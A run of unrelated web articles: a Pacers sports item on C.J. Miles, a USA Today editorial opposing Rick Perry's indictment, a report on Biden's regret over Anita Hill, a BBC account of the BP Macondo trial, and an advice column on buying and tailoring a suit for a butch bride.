"C.J. is a great shooter," Sloan said. "I think the two times we played against him last season, we couldn't stop him. One game, he had six 3s. The other game, hit three consecutive ones."
Miles shot 39.3 percent from 3-point range for Cleveland last season, the best percentage in his nine-year NBA career.
The duo also tweeted at each other. Miles opened with "you can't get rid of me bruh lol". Sloan answered with: "my man..... lol welcome aboard fam.... #PacerNation".
my man..... lol welcome aboard fam.... #PacerNation “@masfresco: @dsloan15 you can't get rid of me bruh lol” — SAUCE (@dsloan15) July 3, 2014
Sloan added that Miles has a musical background.
"He's a rapper, you should get him to rap for you," Sloan said. "He's a real rapper, he has a CD and everything. He could make a living off it if he wasn't playing basketball."
Call Star reporter Phillip B. Wilson at (317) 444-6642. Follow him on Twitter: @pwilson24.
Let voters, not jurors, judge Texas governor's politics.
Texas Gov. Rick Perry arrives at the courthouse in Austin on Tuesday. (Photo: Eric Gay, AP)
Politics as usual should not be a violation of criminal law. This ought to be obvious to anyone in a democratic society. But it does not seem to be well understood in Texas, where a special prosecutor in Austin persuaded a grand jury last week to indict Gov. Rick Perry, who was booked and fingerprinted on Tuesday.
Perry, a once and potential future candidate for the Republican presidential nomination, has been charged with misusing his office and coercing a public official. Sounds serious, until you look at the flimsy, two-page indictment.
OPPOSING VIEW: Time for Perry to step down
Perry's alleged offense? That he demanded the resignation of Travis County District Attorney Rosemary Lehmberg after she pleaded guilty to driving while intoxicated, then vetoed funding for a state public integrity unit that her office relies upon after she refused to step down.
The case rests on a highly dubious legal argument: Perry can exercise his rights of free speech to seek Lehmberg's resignation, and he can exercise his power of the line-item veto over use of state funds. But, supposedly, he can't do them in tandem.
This bid to criminalize politics will undermine more legitimate cases against public officials. One can easily imagine other politicians saying they, too, are being prosecuted just for doing their jobs, even when the charges against them are much stronger.
Perry's actions were classic hardball politics. Travis County includes the state capital, Austin, so its district attorney largely controls the state's public integrity prosecutions. That power has been used to mount cases against GOP politicians, including former U.S. senator Kay Bailey Hutchison and former House majority leader Tom DeLay.
Perry's moves were part of a longstanding effort by Republicans to transfer public integrity powers to an office such as the state attorney general's, which is much more likely to be in Republican hands. These moves clearly fall into the category of politics and policymaking, and should be judged by voters, not jurors.
The case might not be as politically motivated as it seems on the surface. It is being brought by a special prosecutor appointed by a Republican judge. Even so, it is still misguided in the extreme. It is part of an unhealthy trend of political issues being forced into courts rather than being resolved by voters.
Beyond Perry, two other potential Republican presidential aspirants also face investigations. One, involving New Jersey Gov. Chris Christie and lane closures at the George Washington Bridge, is a straightforward, legitimate focus of inquiry. But another, involving fundraising efforts on behalf of Wisconsin Gov. Scott Walker, seems just as mired in politics as the Perry case.
On the other side, Republicans keep turning to courts to resolve policy differences with President Obama. They've tried to get the courts to invalidate all or parts of Obamacare. And the House recently voted to sue Obama over his use of executive orders.
Chalk it up to dysfunction and polarization. With elected branches of government so unable to act in the public interest, some people think that courts can fix things. They can't. Not in Washington. And not in Austin.
USA TODAY's editorial opinions are decided by its Editorial Board, separate from the news staff. Most editorials are coupled with an opposing view — a unique USA TODAY feature.
Read or Share this story: http://usat.ly/1oOucfW
Former Vice President Joe Biden Joseph (Joe) Robinette BidenBannon: 'Zero' doubt Trump will run for reelection Bernie is back with a bang — but can he hold on to his supporters? Klobuchar backs legalizing marijuana MORE said in a new interview that he wishes he had done more for Anita Hill during her 1991 testimony against then-Supreme Court nominee Clarence Thomas.
"I wish I had been able to do more for Anita Hill," Biden told Teen Vogue in an interview published Wednesday. "I owe her an apology."
Biden chaired the Senate Judiciary Committee when Hill testified against Thomas, her boss, during Thomas's confirmation process.
ADVERTISEMENT
"I believed Anita Hill. I voted against Clarence Thomas. And I insisted the next election — I campaigned for two women senators on the condition that if they won they would come on the Judiciary Committee, so there would never be again all men making a judgement on this," Biden told the magazine in the interview.
The Delaware senator, who said Wednesday in a television interview that he may run for president in 2020, said he regrets not being able to stop the attacks launched toward Hill by Republican lawmakers.
"And my one regret is that I wasn't able to tone down the attacks on her by some of my Republican friends. I mean, they really went after her. As much as I tried to intervene, I did not have the power to gavel them out of order. I tried to be like a judge and only allow a question that would be relevant to ask."
Thomas was ultimately confirmed to the nation's highest court and still serves on it. Hill has said Biden doesn't fully understand his "ownership" of the hearings.
Image caption BP has already agreed huge payouts in the wake of the spill
BP has been accused of disregarding evidence during drilling that the Macondo oil well was unstable.
Expert witness Alan Huffman told the third day of the New Orleans trial over the Gulf of Mexico spill that BP should have heeded a "kick" in the well.
"It is truly egregious to drill that extra 100 feet, knowing you could lose the well in the process," he said.
BP accepts partial responsibility for the oil spill, but claims other firms at the trial share the blame and costs.
These include Transocean, the operator of the Deepwater Horizon rig being used, and Halliburton, who provided cement for lining the Macondo well.
Both firms have sought to apportion all the blame for the 2010 oil spill on BP.
The Macondo explosion killed 11 men and released an estimated four million barrels of oil into the Gulf over 84 days. Since the leak was plugged, the debate over who was responsible has raged on.
If BP loses, it could face a huge fine, despite having already agreed in 2012 to pay $4.5bn (£2.9bn) to settle criminal charges.
An unfavourable trial verdict could see the firm liable for the biggest civil fine in history, of up to $17.6bn.
Media playback is unsupported on your device Media caption Oil analyst Nick McGregor: Brand BP is not going to redeem itself until after a final settlement
It has also paid out $7.8bn in a settlement with people and businesses affected.
'Tremendous pressure'
Mr Huffman, chief technology officer for Fusion Petroleum Technologies Inc, was called to the trial by the plaintiffs.
The geophysicist, who has worked for Conoco and Exxon, said the kick during drilling in 2009 - a year before the spill - was evidence of gas or oil intrusion.
He said it should have made plain to BP employees that the pressure under the well was unstable, making the well "dangerous and fragile", and that drilling should have stopped immediately.
The lawyers bringing the action on behalf of the US Department of Justice and the various US states affected by the spill have accused BP of putting profits ahead of safety.
Earlier in the day, the court heard recorded testimony from former chief executive Tony Hayward, and from the former head of drilling operations, Kevin Lacy, who appeared to contradict one another.
In a 20-minute excerpt from hours of examination carried out in 2011, Mr Hayward insisted that cost-cutting at BP had not affected its drilling operations.
Mr Lacy, in contrast, said that $250m-300m had been cut from his budget in 2008-09, while production increased by over 50%.
"I was never given a directive to cut corners or deliver something not safely, but there was tremendous pressure on costs," he said.
Mr Lacy resigned from BP a few months before the spill, because of his concerns about safety.
The day began with another BP executive, exploration and production head Lamar McKay, who finished his live testimony, repeating the line he gave on Tuesday that others shared the blame with BP.
"We've agreed that we're part of the responsibility for this tragic accident," he said. "We've apologised for that."
Cross-examining Mr McKay, lawyers acting for Transocean got him to agree that Deepwater Horizon had been "a very safe operating rig" but only "up until the accident".
Halliburton's lawyer produced an email sent by BP engineer Brian Morel to colleagues on the day of the well blowout that said: "Just wanted to let you know that the Halliburton cement team they sent out did a great job."
Hey, Ariel. While my partner is getting married in a lovely gown, I lean more towards the butch end of the spectrum and would like to get married in a stylin' suit or maybe even a tux. Question is, I just can't find any good suits for women. Help? -Jessica
It turns out that many butches, transmasculine beings, and other festive gender-benders would like to know exactly how a person to whom men's clothes are not traditionally marketed should go about purchasing a well-fitted suit or tuxedo. The answer, I am cheerful to tell you, is the same as it is for any person of any gender or sex who wants to buy a suit and have it fit well.
First: buy a suit. A decent–quality suit.
Next: take it to your tailor (or use the tailoring services of the place where you bought it). If you don't have a tailor, ask your suit-iest pal where he or she goes.
Those are the key points.
The bad news is that you will not be renting anything, and you will not be getting off the hook for less than $300 to $400 if you buy the suit new. The good news is that a good-quality suit will last twenty years if your size remains stable and you care for it well.
A well-fitted suit costs more money — there is no way around it. Unless you are a perfect size off the rack, you will need a tailor. Cheap suits cannot be tailored much because they're not cut for it — they're all of a piece instead of assembled out of contoured parts, which is cheaper to make but cannot be altered much beyond shortening legs or arms. Someone who wants a nice suit that fits well should be prepared to go to, say, Men's Wearhouse at least (and a department store or specialty shop at best). Men's Wearhouse also guarantees their tailoring for life, and carries a very wide range of sizes for those of us who are short, fat, or (like me) both.
The most important measurements are shoulders for a suitcoat, and hips for the trousers. This is because they are the most difficult parts of a suit to alter. Buying a suit that fits you well across the shoulders will mean that it can be let out or taken in at the waist with relative ease (up to two inches in either direction, no problem. Maybe three, if the tailor is clever). Ditto, pants. Pants can be taken in up to four inches at the waist, but nothing will ever eliminate the terrible pockets gaping problem you get when trousers are too tight across the hips – do not let this happen to you. Pick a pair of pants that fit across your hips. Sleeves can be shortened, suitcoats can be shortened. Trousers can be taken up at the rise, the seat, shortened, tapered a bit – whatever is necessary. Does it cost more to have such exact tailoring? Yes. Will you end up with a well-fit, great-looking suit? Yes.
(If money is no object, get a suit custom-made to measure from places like Duchess Clothier or Saint Harridan.)
Learn the language of suit shopping
Suits are called by jacket size, and a regular (or R) suit will usually have a jacket size six inches more than the pants size that goes with it (this is called the drop. A classic drop is six inches, and an "athletic" drop is usually eight. A long suit (or L) will have arms that are 1 to 2 inches longer in the sleeves, in proportion, and a slightly longer rise (the rise is the distance between the button and the point of the crotch, in the trousers). A short (or S) will be shorter, and a portly (or P) will have more room in the gut.
Your dress pants size is probably the same as your jeans size up to a 32, and one size larger from 34 upwards. So if you wear a size 38 jeans, you probably wear a 40 in dress pants, and thus your suit size is a 46.
Start there. If you're not ready to ask a salesclerk for help, try a few of the suitcoats in what you guess is probably your size on. Try buttoning them, and also crossing your arms. Sit down for a minute. It's not going to feel as comfortable as your tracksuit, but you should not feel any binding or bunching across the upper arms or just above the knee, and you should be able to fold your arms across your chest without feeling like the jacket is straining. If you feel any of those, go up a size. If you're swimming, go down a size. Remember that a double breasted suit is cut rather differently from a single-breasted suit, and your size may vary if you want a double-breasted suit (they're better for the skinny, as they add a little bulk). People over, say, a size 50 will sometimes do well in a longer-jacketed suit, because it adds a streamlining effect, and may want to buy a longer jacket and have the trousers taken up.
Two button suits look more conservative than three-buttons; solids are more conservative than stripes, pinstripes are more conservative than chalk stripes. Don't let anyone sell you anything windowpane unless you are sure, really sure, that you can pull it off – and it should never be your only suit if you have any choice in the matter.
In terms of color, black is for funerals and formal weddings only — and isn't as versatile, no matter what any saleperson tells you, unless you are Ryan Seacrest. The classic choices for most white people are charcoal or a deep, true navy; most people with darker skin opt for the navy or a lighter grey (which is about actual skin tone, not racial or ethnic identity — choose what suits you).
"Fashion" suits, as opposed to business suits, have tighter armholes, narrower lapels, and a slimmer fit. The jacket hem will sometimes stop as high as the wrist. The pants that go with fashion suits are usually tapered as well. A fashion suit might not look like a fashion suit on you if you are slimmer and shorter, so if you're a fairly slender person this can be an excellent way to get a jacket that's proportioned right.
Don't worry about buying a men's suit — act like it's perfectly normal and everyone else will, too. If you're feeling terrifically uncomfortable or afraid of gender-policing backlash, tell anyone who gives you the stink-eye that you're in a play. Be clear about how you want your tailoring: a straight hem or a cuff on your pants? Do you like to show more shirt cuff (as many of us cufflink-wearers do) or a little less? Do you want the pants tapered a little or wider at the cuff to allow for boots? Is there too much fabric in the seat? Do you need more room in the thighs? If you're not sure, ask the tailor, salesclerk, or other shoppers what they think. Just like anything, knowing the terms will make you feel more comfortable, and it will make the tailor take you more seriously.
Don't be shy, don't be nervous, do take along someone who you are sure will tell you whether you look good if you can. And buy a damn dress belt. A suit without a belt just looks unfinished.
